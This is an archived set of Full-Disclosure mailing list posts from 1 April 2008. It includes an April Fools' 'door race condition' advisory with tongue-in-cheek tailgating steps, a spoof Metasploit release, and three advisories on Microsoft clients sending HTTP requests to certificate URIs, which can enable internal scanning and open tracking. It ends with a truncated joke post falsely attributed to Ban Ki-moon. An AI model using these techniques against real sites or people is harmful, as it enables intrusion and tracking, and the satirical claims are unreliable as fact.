From druid at caughq.org  Tue Apr  1 06:00:22 2008
From: druid at caughq.org (I)ruid)
Date: Tue, 01 Apr 2008 00:00:22 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
Message-ID: <1207026022.3142.287.camel@localhost>

                      ____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/
                                                     
                    Computer Academic Underground
                        http://www.caughq.org
                          Security Advisory 

===============/========================================================
Advisory ID:    CAU-2008-0001
Release Date:   04/01/2008
Title:          Slowly Closing Door Race Condition
Application/OS: Physical Structures
Topic:          Physical structures employing exit doors with locks
                are vulnerable to a race condition.
Vendor Status:  Not Notified
Attributes:     Physical, Race Condition
Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0001.txt
Author/Email:   CAU <advisories (at) caughq.org>
===============/========================================================

Overview
========

Physical structures which employ automatically locking doors to secure 
exit points expose a race condition which may allow unauthorized entry.


Impact
======

Malicious outsiders may be able to enter a structure via an exit point.

Exit points may additionally provide an exit from a secure area of the
structure, allowing an outsider entering through the exit point to gain
direct access to the secure area.


Affected Systems
================

Physical structures which employ automatically locking doors at exit
points of the structure.


Technical Explanation
=====================

An exit's lock[1] generally converts a two-way door into a one-way
door, allowing a person to traverse the door's threshold in one
direction but not in the other.  These types of locks are used to
secure exit points of structures so that people may exit via the door
but not re-enter without disabling the lock through force or
authentication. 

When a person exits the structure through an exit point which is
secured by such a mechanism, a race condition exists wherein a
malicious outsider may be able to reach the door and enter through it
before it closes and locks itself.

Many doors, especially heavier ones, also employ closing mechanisms[2]
which are designed to cause the door to close slowly so as not to slam
the door shut and damage the door frame, or damage any human appendage
which may be in between the door and it's frame.  Such closing
mechanisms can greatly increase the amount of time that the race
condition exists.


Solution & Recommendations
==========================

1) Always ensure that personnel exiting an exit door wait outside the
   door until it has completely closed and locked before walking
   away.

2) Employ a double door system such as is used in an air-lock where
   the interior door must be secured prior to the exterior door being
   allowed to open.


Exploitation
============

First identify the exit point that you want to exploit.  Stand at a
safe distance during a high-traffic time and watch for people to use
the exit point.  Time how long it takes for the door to close and
lock itself when someone traverses the exit point.

Next, identify a safe hiding place near the exit point, preferably
in a direction that would be behind a person exiting the door, but
which is within a distance to the exit point which you could traverse
in under the door's closing time at a brisk pace or run.

Finally, hide in this location during a lower traffic time and wait
for someone to utilize the exit point.  After they have exited the
door and are walking away, run to the door and enter before it has
closed and locked.  Extra points are awarded for a spectacular dive
and/or roll to catch the door at the very last second.


References
==========

[1] http://en.wikipedia.org/wiki/Lock_%28device%29
[2] http://en.wikipedia.org/wiki/Door_closer


Credits & Gr33ts
================

Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214 


-- 
I)ruid, C?ISSP
druid at caughq.org
http://druid.caughq.org
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/73434c07/attachment.bin 

From nate.mcfeters at gmail.com  Tue Apr  1 06:18:00 2008
From: nate.mcfeters at gmail.com (Nate McFeters)
Date: Tue, 1 Apr 2008 00:18:00 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race
	Condition
In-Reply-To: <1207026022.3142.287.camel@localhost>
References: <1207026022.3142.287.camel@localhost>
Message-ID: <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>

Hahaha, nice find.

On 4/1/08, I)ruid <druid at caughq.org> wrote:
>
>                      ____      ____     __    __
>                     /    \    /    \   |  |  |  |
>        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
>                   |  |      |  |__|  | |  |  |  |
>                   |  |  ___ |   __   | |  |  |  |
> ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
>                     \____/  |__|  |__|  \______/
>
>                    Computer Academic Underground
>                        http://www.caughq.org
>                          Security Advisory
>
> ===============/========================================================
> Advisory ID:    CAU-2008-0001
> Release Date:   04/01/2008
> Title:          Slowly Closing Door Race Condition
> Application/OS: Physical Structures
> Topic:          Physical structures employing exit doors with locks
>                are vulnerable to a race condition.
> Vendor Status:  Not Notified
> Attributes:     Physical, Race Condition
> Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0001.txt
> Author/Email:   CAU <advisories (at) caughq.org>
> ===============/========================================================
>
> Overview
> ========
>
> Physical structures which employ automatically locking doors to secure
> exit points expose a race condition which may allow unauthorized entry.
>
>
> Impact
> ======
>
> Malicious outsiders may be able to enter a structure via an exit point.
>
> Exit points may additionally provide an exit from a secure area of the
> structure, allowing an outsider entering through the exit point to gain
> direct access to the secure area.
>
>
> Affected Systems
> ================
>
> Physical structures which employ automatically locking doors at exit
> points of the structure.
>
>
> Technical Explanation
> =====================
>
> An exit's lock[1] generally converts a two-way door into a one-way
> door, allowing a person to traverse the door's threshold in one
> direction but not in the other.  These types of locks are used to
> secure exit points of structures so that people may exit via the door
> but not re-enter without disabling the lock through force or
> authentication.
>
> When a person exits the structure through an exit point which is
> secured by such a mechanism, a race condition exists wherein a
> malicious outsider may be able to reach the door and enter through it
> before it closes and locks itself.
>
> Many doors, especially heavier ones, also employ closing mechanisms[2]
> which are designed to cause the door to close slowly so as not to slam
> the door shut and damage the door frame, or damage any human appendage
> which may be in between the door and it's frame.  Such closing
> mechanisms can greatly increase the amount of time that the race
> condition exists.
>
>
> Solution & Recommendations
> ==========================
>
> 1) Always ensure that personnel exiting an exit door wait outside the
>   door until it has completely closed and locked before walking
>   away.
>
> 2) Employ a double door system such as is used in an air-lock where
>   the interior door must be secured prior to the exterior door being
>   allowed to open.
>
>
> Exploitation
> ============
>
> First identify the exit point that you want to exploit.  Stand at a
> safe distance during a high-traffic time and watch for people to use
> the exit point.  Time how long it takes for the door to close and
> lock itself when someone traverses the exit point.
>
> Next, identify a safe hiding place near the exit point, preferably
> in a direction that would be behind a person exiting the door, but
> which is within a distance to the exit point which you could traverse
> in under the door's closing time at a brisk pace or run.
>
> Finally, hide in this location during a lower traffic time and wait
> for someone to utilize the exit point.  After they have exited the
> door and are walking away, run to the door and enter before it has
> closed and locked.  Extra points are awarded for a spectacular dive
> and/or roll to catch the door at the very last second.
>
>
> References
> ==========
>
> [1] http://en.wikipedia.org/wiki/Lock_%28device%29
> [2] http://en.wikipedia.org/wiki/Door_closer
>
>
> Credits & Gr33ts
> ================
>
> Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214
>
>
> --
> I)ruid, C?ISSP
> druid at caughq.org
> http://druid.caughq.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/6a2773b9/attachment.html 

From fdlist at digitaloffense.net  Tue Apr  1 06:49:23 2008
From: fdlist at digitaloffense.net (METASPLOIT CORPORATION)
Date: Tue, 1 Apr 2008 00:49:23 -0500
Subject: [Full-disclosure] Metasploit Framework 4.0 / PwnCraft RTS Game
Message-ID: <200804010049.23823.fdlist@digitaloffense.net>



            FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)

    METASPLOIT CORPORATION ANNOUNCES VERSION 4.0 
OF THE METASPLOIT FRAMEWORK WITH EXCITING FEATURES
       AND A CLOSED SOURCE LICENSE AGREEMENT.  

After over a year and a half in stealth-mode, Metasploit Corporation has announced
the 4.0 release of their flag-ship product, The Metasploit Framework.  The new
release comes jam-packed with exciting features that are sure to please even
the German legal system.  The following brief list includes some of the more
fantastic changes.

PWNCRAFT!

Tired of fighting the good fight with the tried and true user interfaces you've
come to expect from exploitation frameworks?  Seeing a command shell for the
5000th time got you down?  Well, you're in luck.  Metasploit has decided to
return to its rootz in '08 and focus on the exploitation-as-a-game model.
PwnCraft brings the worlds of ownage and pwnage together for the first time in
a revolutionary Real Time Strategy (RTS) world.  Don't be fooled by the
game-like interface, though!  The actions you take in PwnCraft have a real
effect on the world around you!  Here's just a taste of some of the absolutely
insane features you can look forward to:

  - Glide through enemy networks with a squadron of elegant winged pwnies
  - Launch devastating attacks against enemy ports in an all-out IPS-evading
    TCP/IP assault
  - Use the fuzzy Burrowing Badger unit to discover 0day flaws in enemy
    defenses
  - Conqueer cities and installing agents who can sabotage and smuggle other
    units to new Vistas
  - An entirely in-game interface to the vulnerability sharing market to
    improve your arsenal on the fly!
  - AND MORE!

Beta testing of PwnCraft is currently underway and we are hoping to begin
releasing it in stores at a retail price of $49.99 in Q3 2009.  More details
about the game can be found on the Metasploit website:

http://metasploit.com/


CLOSED SOURCE LICENSE

After years of struggling to define Metasploit's licensing position a final
decision has been made to "screw it" and move the framework to a closed source
license agreement.  The decision was made to sell out for a number of reasons,
not the least of which has to do with the benjamins.  Metasploit 2.x and 3.x
will no longer be available for public download.

SPLOIT AT ME

Get the latest exploits from Metasploit's patent-pending Sploit At Me service
that delivers exploits on demand.  You can rest assured that Metasploit's
Sploit At Me service will attempt to compromise machines of your choosing with
*99% reliability.

About Metasploit Corporation

Metasploit Corporation is an industry leader with thousands of non-paying
customers world-wide.  Metasploit delivers high-quality, top-notch,
success-driven exploits to the security world as one-stop-shop exploitation
framework.


  * The other 1% of the time, your own machine will be compromised.



From a.klink at cynops.de  Tue Apr  1 10:05:53 2008
From: a.klink at cynops.de (Alexander Klink)
Date: Tue, 01 Apr 2008 11:05:53 +0200
Subject: [Full-disclosure] HTTP over X.509 - Microsoft Outlook
Message-ID: <47F1FAF1.8020804@cynops.de>

============================================
||| Security Advisory AKLINK-SA-2008-002 |||
============================================

HTTP over X.509 (S/MIME) - Microsoft Outlook
============================================

Date released: 01.04.2008
Date reported: 11.01.2008
$Revision: 1.1 $

by Alexander Klink
   Cynops GmbH
   a.klink at cynops.de
   https://www.cynops.de/advisories/AKLINK-SA-2008-002.txt
   (S/MIME signed: 
https://www.cynops.de/advisories/AKLINK-SA-2008-002-signed.txt)
   https://www.klink.name/security/aklink-sa-2008-002-outlook-smime.txt

Vendor: Microsoft
Product: Outlook
Type of vulnerability: design problem
Class: remote
Status: unpatched
Severity: moderate
Releases known to be affected: Outlook 2007 (12.0.4518.1014)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

S/MIME (Secure / Multipurpose Internet Mail Extensions) is a standard
for public key encryption and signing of e-mail based on X.509 certificates.
X.509 certificates allow a number of extension which specify URIs for
additional information regarding the certificate - for example a location
where to download the issuer certificate(s). For details see RFC 3851/3850.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

When receiving an S/MIME-signed email, Outlook attempts to
use the additional URIs contained in the certificate to download
information relevant for the verification of the certificate. It
will automatically send out HTTP requests to any location that
is reachable from the client - which might include networks previously
unreachable to an attacker.

Results are unnoticed access to both external or internal webservers,
which in turn could be attacked using other vectors and - in the simplest
case - a "reading confirmation", which is often undesired by the
recipient as well (for example if the sender is a spammer).

For an overview of this class of attacks, see the ?HTTP over X.509?
whitepaper at https://www.cynops.de/techzone/http_over_x509.html.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

For an introduction to the technical details, please see the whitepaper.
In this particular case, Microsoft Crypto API handles the
authorityInfoAccess caIssuers extension. The HTTP requests are sent
out as soon as the e-mail is opened in the preview pane.

The Microsoft Crypto API accepts up to five CA Issuer URIs in the
given certificate which may be up to 8 kibibit each (so there is
enough space for a potential attack payload). Contrary to the RFC,
it only accepts HTTP URIs. The Crypto API connects to arbitrary
TCP ports (both privileged and unprivileged) specified in the HTTP
URI.

In one test, the attempt to connect to a running machine
(more or less regardless whether the particular requested port is
open or not) took about 3 seconds and attempting to connect to
an unreachable machine took about 10-16 seconds. If this could
be confirmed to be always the case (some preliminary tests indicated
otherwise), this would allow one to scan for internal hosts via mail
(at the great speed of two hosts per opened mail - it is not as fast as
PortBunny, granted).

In yet undetermined intervals, it also seems to occasionally try
to get the CA issuer certificates again, leading to more HTTP requests.

Also to be noted is that the certificate validation takes place even if the
S/MIME signature itself is invalid - this means than a clever spammer
would not even have to burn CPU cycles on creating correct signatures.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Proof of Concept:

To receive such an S/MIME-signed email that triggers a HTTP request
and to verify that this request reaches an outside server, send a
blank email to smime-http at klink.name.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

11.01.2008, 17:20 UTC:
    Contacted secure at microsoft.com with information, advisory
    draft (in an S/MIME-encrypted mail) and an example mail.

11.01.2008, 18:30 and 18:49 UTC:
    The example mail triggers HTTP requests from 131.107.0.[104|75]
    with a user agent of "Microsoft-CryptoAPI/5.131.3790.3959".

11.01.2008, 21:54 UTC:
    Nate from Microsoft replies with case number (7897) and case manager
    (Geoff). The original mail is fullquoted in this unencrypted reply -
    why did I bother to install their certificate again?

14.01.2008, 17:33 UTC:
    The example mail triggers more HTTP requests from 131.107.0.103,
    this time with a user agent of "Microsoft-CryptoAPI/5.131.2600.2180".

31.01.2008/01.02.2008:
    The example mail regularly triggers HTTP requests from 207.46.55.29,
    with user agents of
      "Microsoft-CryptoAPI/5.131.2600.2180"
      "Microsoft-CryptoAPI/5.131.2600.3285",
      "Microsoft-CryptoAPI/5.131.2600.3297",
      "Microsoft-CryptoAPI/5.131.3790.1830",
      "Microsoft-CryptoAPI/5.131.3790.3959" and
      "Microsoft-CryptoAPI/6.0",

01.02.2008, 00:14 UTC:
    Geoff replies to let me know they are working on it (yes, I can see
    that :-). Dave and a few additional teams are assisting with the
    investigation of the issue, no requests for additional information,
    they will stay in contact within the next few weeks to provide me
    with an update. The original report is again sent along unencrypted
    and fullquoted.
   
February/March 2008:
    The occasional Microsoft HTTP request appears in the webserver logfiles

18.03.2008:
    Requested update on the issue, informed them that Office 2007 is
    vulnerable to the same problem as well (as are signed executables,
    but the signature is not checked automatically) and IPSec does not
    seem to be vulnerable.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

None so far.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workarounds:

- limit Outlook's ability to do HTTP requests, for example by setting an
  invalid proxy in the internet options. If possible, filter outgoing
  HTTP requests with a user-agent matching "Microsoft-CryptoAPI/*"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Why this advisory has no CVE ID:

Normally, I make sure every advisory I release has a CVE ID to ensure that
the issue can be identified without doubt. In the past, I have been
assigned CVE IDs directly and promptly by Steve Christey of MITRE.
The communication in this case went like this:

17.01.2008: contacted Steve Christey with the question on how to handle
            CVEs for a generic issue in an RFC that is vulnerable in
            a specific implementation.
01.02.2008: contact Steve again to ask for an update
01.02.2008: Steve replies saying that he must have missed the first
            email and says:
 | This can be a tough one for CVE, but if it's a fundamental design problem
 | in a single RFC, and *any* conformant implementation will have the issue,
 | then it gets a single CVE.
02.02.2008: Updated Steve with details on the vulnerability
07.02.2008: Contacted Steve again for an update
26.02.2008: Contacted Steve again with the explicit wish for CVE IDs
            for the issues in Outlook, Windows Live Mail and Office 2007
28.02.2008: Contacted Steve again asking for the assignment of the CVE IDs
28.02.2008: Contacted cve at mitre.org as well in case Steve is no longer the
            correct contact

 >From what I read on the CVE website, it looks like Microsoft assigns
the CVE IDs for their own issues themselves, but they don't talk to me
very much either. I like the CVE idea and would like to use CVE IDs
whenever possible, but someone would have to answer my mails for that.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Alexander Klink, Cynops GmbH (discovery)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Thanks to:

- Philipp S?dmeyer for the help in trying out the first attacks


-- 
Dipl.-Math. Alexander Klink | IT-Security Engineer |    a.klink at cynops.de
 mobile: +49 (0)178 2121703 |          Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
      HRB 7833, Amtsgericht | USt-Id: DE 213094986 |     Gesch?ftsf?hrer:
     Bad Homburg v. d. H?he |                      |      Martin Bartosch


-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 5045 bytes
Desc: S/MIME Cryptographic Signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/9e0c93b0/attachment.bin 

From a.klink at cynops.de  Tue Apr  1 10:06:03 2008
From: a.klink at cynops.de (Alexander Klink)
Date: Tue, 01 Apr 2008 11:06:03 +0200
Subject: [Full-disclosure] HTTP over X.509 - Windows Live Mail
Message-ID: <47F1FAFB.106@cynops.de>

============================================
||| Security Advisory AKLINK-SA-2008-003 |||
============================================

HTTP over X.509 (S/MIME) - Windows Live Mail
============================================

Date released: 01.04.2008
Date reported: 11.01.2008
$Revision: 1.1 $

by Alexander Klink
   Cynops GmbH
   a.klink at cynops.de
   https://www.cynops.de/advisories/AKLINK-SA-2008-003.txt
   (S/MIME signed: 
https://www.cynops.de/advisories/AKLINK-SA-2008-003-signed.txt)
   https://www.klink.name/security/aklink-sa-2008-003-live-mail-smime.txt

Vendor: Microsoft
Product: Windows Live Mail
Type of vulnerability: design problem
Class: remote
Status: unpatched
Severity: moderate
Releases known to be affected: 2008 (Build 12.0.1606)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

S/MIME (Secure / Multipurpose Internet Mail Extensions) is a standard
for public key encryption and signing of e-mail based on X.509 certificates.
X.509 certificates allow a number of extension which specify URIs for
additional information regarding the certificate - for example a location
where to download the issuer certificate(s). For details see RFC 3851/3850.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

When receiving an S/MIME-signed email, Windows Live Mail attempts to
use the additional URIs contained in the certificate to download
information relevant for the verification of the certificate. It
will automatically send out HTTP requests to any location that
is reachable from the client - which might include networks previously
unreachable to an attacker.

Results are unnoticed access to both external or internal webservers,
which in turn could be attacked using other vectors and - in the simplest
case - a "reading confirmation", which is often undesired by the
recipient as well (for example if the sender is a spammer).

For an overview of this class of attacks, see the ?HTTP over X.509?
whitepaper at https://www.cynops.de/techzone/http_over_x509.html.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

For an introduction to the technical details, please see the whitepaper.
In this particular case, Microsoft Crypto API handles the
authorityInfoAccess caIssuers extension. The HTTP requests are sent
out as soon as the e-mail is opened in the preview pane.

The Microsoft Crypto API accepts up to five CA Issuer URIs in the
given certificate which may be up to 8 kibibit each (so there is
enough space for a potential attack payload). Contrary to the RFC,
it only accepts HTTP URIs. The Crypto API connects to arbitrary
TCP ports (both privileged and unprivileged) specified in the HTTP
URI.

In one test, the attempt to connect to a running machine
(more or less regardless whether the particular requested port is
open or not) took about 3 seconds and attempting to connect to
an unreachable machine took about 10-16 seconds. If this could
be confirmed to be always the case (some preliminary tests indicated
otherwise), this would allow one to scan for internal hosts via mail
(at the great speed of two hosts per opened mail - it is not as fast as
PortBunny, granted).

In yet undetermined intervals, it also seems to occasionally try
to get the CA issuer certificates again, leading to more HTTP requests.

Also to be noted is that the certificate validation takes place even if the
S/MIME signature itself is invalid - this means than a clever spammer
would not even have to burn CPU cycles on creating correct signatures.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Proof of Concept:

To receive such an S/MIME-signed email that triggers a HTTP request
and to verify that this request reaches an outside server, send a
blank email to smime-http at klink.name.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

11.01.2008, 17:20 UTC:
    Contacted secure at microsoft.com with information, advisory
    draft (in an S/MIME-encrypted mail) and an example mail.

11.01.2008, 18:30 and 18:49 UTC:
    The example mail triggers HTTP requests from 131.107.0.[104|75]
    with a user agent of "Microsoft-CryptoAPI/5.131.3790.3959".

11.01.2008, 21:54 UTC:
    Nate from Microsoft replies with case number (7897) and case manager
    (Geoff). The original mail is fullquoted in this unencrypted reply -
    why did I bother to install their certificate again?

14.01.2008, 17:33 UTC:
    The example mail triggers more HTTP requests from 131.107.0.103,
    this time with a user agent of "Microsoft-CryptoAPI/5.131.2600.2180".

31.01.2008/01.02.2008:
    The example mail regularly triggers HTTP requests from 207.46.55.29,
    with user agents of
      "Microsoft-CryptoAPI/5.131.2600.2180"
      "Microsoft-CryptoAPI/5.131.2600.3285",
      "Microsoft-CryptoAPI/5.131.2600.3297",
      "Microsoft-CryptoAPI/5.131.3790.1830",
      "Microsoft-CryptoAPI/5.131.3790.3959" and
      "Microsoft-CryptoAPI/6.0",

01.02.2008, 00:14 UTC:
    Geoff replies to let me know they are working on it (yes, I can see
    that :-). Dave and a few additional teams are assisting with the
    investigation of the issue, no requests for additional information,
    they will stay in contact within the next few weeks to provide me
    with an update. The original report is again sent along unencrypted
    and fullquoted.
   
February/March 2008:
    The occasional Microsoft HTTP request appears in the webserver logfiles

18.03.2008:
    Requested update on the issue, informed them that Office 2007 is
    vulnerable to the same problem as well (as are signed executables,
    but the signature is not checked automatically) and IPSec does not
    seem to be vulnerable.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

None so far.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workarounds:

- limit Live Mail's ability to do HTTP requests, for example by setting an
  invalid proxy in the internet options. If possible, filter outgoing
  HTTP requests with a user-agent matching "Microsoft-CryptoAPI/*"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Why this advisory has no CVE ID:

Normally, I make sure every advisory I release has a CVE ID to ensure that
the issue can be identified without doubt. In the past, I have been
assigned CVE IDs directly and promptly by Steve Christey of MITRE.
The communication in this case went like this:

17.01.2008: contacted Steve Christey with the question on how to handle
            CVEs for a generic issue in an RFC that is vulnerable in
            a specific implementation.
01.02.2008: contact Steve again to ask for an update
01.02.2008: Steve replies saying that he must have missed the first
            email and says:
 | This can be a tough one for CVE, but if it's a fundamental design problem
 | in a single RFC, and *any* conformant implementation will have the issue,
 | then it gets a single CVE.
02.02.2008: Updated Steve with details on the vulnerability
07.02.2008: Contacted Steve again for an update
26.02.2008: Contacted Steve again with the explicit wish for CVE IDs
            for the issues in Outlook, Windows Live Mail and Office 2007
28.02.2008: Contacted Steve again asking for the assignment of the CVE IDs
28.02.2008: Contacted cve at mitre.org as well in case Steve is no longer the
            correct contact

 >From what I read on the CVE website, it looks like Microsoft assigns
the CVE IDs for their own issues themselves, but they don't talk to me
very much either. I like the CVE idea and would like to use CVE IDs
whenever possible, but someone would have to answer my mails for that.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Alexander Klink, Cynops GmbH (discovery)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Thanks to:

- Philipp S?dmeyer for the help in trying out the first attacks using 
Outlook

-- 
Dipl.-Math. Alexander Klink | IT-Security Engineer |    a.klink at cynops.de
 mobile: +49 (0)178 2121703 |          Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
      HRB 7833, Amtsgericht | USt-Id: DE 213094986 |     Gesch?ftsf?hrer:
     Bad Homburg v. d. H?he |                      |      Martin Bartosch


-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 5045 bytes
Desc: S/MIME Cryptographic Signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/e33dbbdc/attachment.bin 

From a.klink at cynops.de  Tue Apr  1 10:06:13 2008
From: a.klink at cynops.de (Alexander Klink)
Date: Tue, 01 Apr 2008 11:06:13 +0200
Subject: [Full-disclosure] HTTP over X.509 - Office 2007
Message-ID: <47F1FB05.2030107@cynops.de>

============================================
||| Security Advisory AKLINK-SA-2008-004 |||
============================================

HTTP over X.509 - Microsoft Office 2007
=======================================

Date released: 01.04.2008
Date reported: 18.03.2008 (a similar issue was reported on 11.01.2008)
$Revision: 1.1 $

by Alexander Klink
   Cynops GmbH
   a.klink at cynops.de
   https://www.cynops.de/advisories/AKLINK-SA-2008-004.txt
   (S/MIME signed: 
https://www.cynops.de/advisories/AKLINK-SA-2008-004-signed.txt)
   
https://www.klink.name/security/aklink-sa-2008-004-office2007-signatures.txt

Vendor: Microsoft
Product: Office 2007
Type of vulnerability: design problem
Class: remote
Status: unpatched
Severity: moderate
Releases known to be affected: 12.0.6212.1000 SP1 MSO (12.0.6213.1000)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

Microsoft Office 2007 allows a user to sign documents using X.509
certificates.
X.509 certificates allow a number of extension which specify URIs for
additional information regarding the certificate - for example a location
where to download the issuer certificate(s).

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

When opening a document with a digital signature, Office 2007 attempts to
use the additional URIs contained in the certificate to download
information relevant for the verification of the certificate. It
will automatically send out HTTP requests to any location that
is reachable from the client - which might include networks previously
unreachable to an attacker.

Results are unnoticed access to both external or internal webservers,
which in turn could be attacked using other vectors and - in the simplest
case - an "opening confirmation", which is often undesired by the
recipient as well (as it can be used to track who opened which document
at what time).

For an overview of this class of attacks, see the ?HTTP over X.509?
whitepaper at https://www.cynops.de/techzone/http_over_x509.html.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

For an introduction to the technical details, please see the whitepaper.
In this particular case, Microsoft Crypto API handles the
authorityInfoAccess caIssuers extension. The HTTP requests are sent
out as soon as the document is opened.

The Microsoft Crypto API accepts up to five CA Issuer URIs in the
given certificate which may be up to 8 kibibit each (so there is
enough space for a potential attack payload). Contrary to the RFC,
it only accepts HTTP URIs. The Crypto API connects to arbitrary
TCP ports (both privileged and unprivileged) specified in the HTTP
URI.

In one test, the attempt to connect to a running machine
(more or less regardless whether the particular requested port is
open or not) took about 3 seconds and attempting to connect to
an unreachable machine took about 10-16 seconds. If this could
be confirmed to be always the case (some preliminary tests indicated
otherwise), this would allow one to scan for internal hosts via mail
(at the great speed of two hosts per opened mail - it is not as fast as
PortBunny, granted).

Contrary to the vulnerabilities in Microsoft Outlook and Windows Live
Mail, the certificate is only verified if the signature is intact.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Proof of Concept:

A signed Word 2007 document that triggers an HTTP request is available at
http://www.klink.name/security/HTTP_over_Office_2007_PoC.docx
The document contains a link which shows the last 10 HTTP requests
triggered by this document. By verifying whether you are on the
list, you can verify if you are affected by this vulnerability.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

18.03.2008:
    As part of a communication on a similar issue in Outlook and
    Windows Live Mail, informed them that Office 2007 is vulnerable
    as well. For details on the earlier communication, see
    AKLINK-SA-2008-002 or AKLINK-SA-2008-003.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

None so far.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workarounds:

- limit Office's ability to do HTTP requests, for example by setting an
  invalid proxy in the internet options. If possible, filter outgoing
  HTTP requests with a user-agent matching "Microsoft-CryptoAPI/*"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Why this advisory has no CVE ID:

Normally, I make sure every advisory I release has a CVE ID to ensure that
the issue can be identified without doubt. In the past, I have been
assigned CVE IDs directly and promptly by Steve Christey of MITRE.
The communication in this case went like this:

17.01.2008: contacted Steve Christey with the question on how to handle
            CVEs for a generic issue in an RFC that is vulnerable in
            a specific implementation.
01.02.2008: contact Steve again to ask for an update
01.02.2008: Steve replies saying that he must have missed the first
            email and says:
 | This can be a tough one for CVE, but if it's a fundamental design problem
 | in a single RFC, and *any* conformant implementation will have the issue,
 | then it gets a single CVE.
02.02.2008: Updated Steve with details on the vulnerability
07.02.2008: Contacted Steve again for an update
26.02.2008: Contacted Steve again with the explicit wish for CVE IDs
            for the issues in Outlook, Windows Live Mail and Office 2007
28.02.2008: Contacted Steve again asking for the assignment of the CVE IDs
28.02.2008: Contacted cve at mitre.org as well in case Steve is no longer the
            correct contact

 >From what I read on the CVE website, it looks like Microsoft assigns
the CVE IDs for their own issues themselves, but they don't talk to me
very much either. I like the CVE idea and would like to use CVE IDs
whenever possible, but someone would have to answer my mails for that.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Alexander Klink, Cynops GmbH (discovery)

-- 
Dipl.-Math. Alexander Klink | IT-Security Engineer |    a.klink at cynops.de
 mobile: +49 (0)178 2121703 |          Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
      HRB 7833, Amtsgericht | USt-Id: DE 213094986 |     Gesch?ftsf?hrer:
     Bad Homburg v. d. H?he |                      |      Martin Bartosch


-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 5045 bytes
Desc: S/MIME Cryptographic Signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/c8ce5963/attachment.bin 

From tecklord at securitylab.ru  Tue Apr  1 10:38:40 2008
From: tecklord at securitylab.ru (Valery Marchuk)
Date: Tue, 1 Apr 2008 12:38:40 +0300
Subject: [Full-disclosure] UN against Open Source. Linux is a threat?
References: <AB202291-2AD3-4AD3-AA36-D4217FFB2114@yahoo.com.ar>
Message-ID: <627CE286524A4000B3318FDCF5074725@gw1>

BBC reports: Secretary-General Ban Ki-moon made an official statement 
supporting Windows Vista and Windows Server 2008.

"I believe a bug in OS Linux has allowed hackers to access Pentagon network 
and steal classified national security information and place blame on China"", 
said Ban Ki-moon

More at

